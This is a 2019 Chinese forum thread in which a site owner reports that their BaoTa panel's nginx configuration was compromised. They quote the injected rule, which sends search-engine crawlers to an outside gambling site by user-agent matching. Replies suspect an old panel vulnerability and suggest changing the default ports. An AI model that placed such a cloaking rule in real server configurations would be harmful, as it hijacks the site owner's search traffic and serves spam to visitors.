宝塔配置文件被挂马
#if ($http_user_agent ~* "baidu|sogou|haosouspider|360spider|Baiduspider|Sosospider|Sogou spider|Sogou web spider|bingbot|YisouSpider|sm.cn|so.com"){rewrite ^/(.*)$1 last;proxy_pass http://bbs.sjc5.com;}这狗日的在里面加了四五条这个 其心可诛啊 跳转到菠菜了。 如何安装的 我也不知道是怎么写进去的! 加在哪里网站的nginx配置配置里面吗
哪个版本的宝塔 我记得有一个版本有验证码漏洞
dalaoa 发表于 2019-3-13 10:29
加在哪里网站的nginx配置配置里面吗
哪个版本的宝塔 我记得有一个版本有验证码漏洞 ...
单站点的配置文件里面 修改宝塔的默认的端口啊, 再启用那个加密的后缀
修改ssh默认端口
一般不会有问题了
bob1987 发表于 2019-3-13 10:34
的确,之前有个版本是可以无密码即可渗透的,老版本了,6.0以上以及非开心版,估计不会有这个情况 ...
windows 系统容易出问题,LINUNX没有出现过
dalaoa 发表于 2019-3-13 10:38
修改宝塔的默认的端口啊, 再启用那个加密的后缀
修改ssh默认端口
一般不会有问题了
数据量非常大 然后当前是 Centos 6 系统 无法安装7 宝塔是正版如何搞进去的我也想知道,楼主研究研究
dalaoa 发表于 2019-3-13 10:38
修改宝塔的默认的端口啊, 再启用那个加密的后缀
修改ssh默认端口
一般不会有问题了
5.9有吗
页:
[1]